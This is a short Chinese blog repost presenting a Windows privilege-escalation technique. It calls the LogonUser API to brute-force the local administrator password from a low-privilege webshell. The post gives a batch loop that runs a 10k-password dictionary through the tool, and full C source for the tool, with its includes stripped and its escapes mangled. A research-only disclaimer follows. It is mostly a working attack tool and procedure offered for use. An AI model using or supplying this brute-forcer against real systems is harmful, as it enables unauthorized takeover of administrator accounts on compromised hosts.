在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆 判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:
#include #include void help() { printf("by x0wolf && lostwolf n"); printf("runas user passn"); } int LoginCreateProcess(char* user,char* pass) { HANDLE hToken; STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken)) { printf("Failed to call LogonUser FailedNum:%dn",GetLastError()); return 0; } else { printf("Login Sucessedn"); return 1; } } int main(int argc,char* argv[]) { if(argc!=3) { help(); exit(0); } if(argc==3) { LoginCreateProcess(argv[1],argv[2]); } }
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论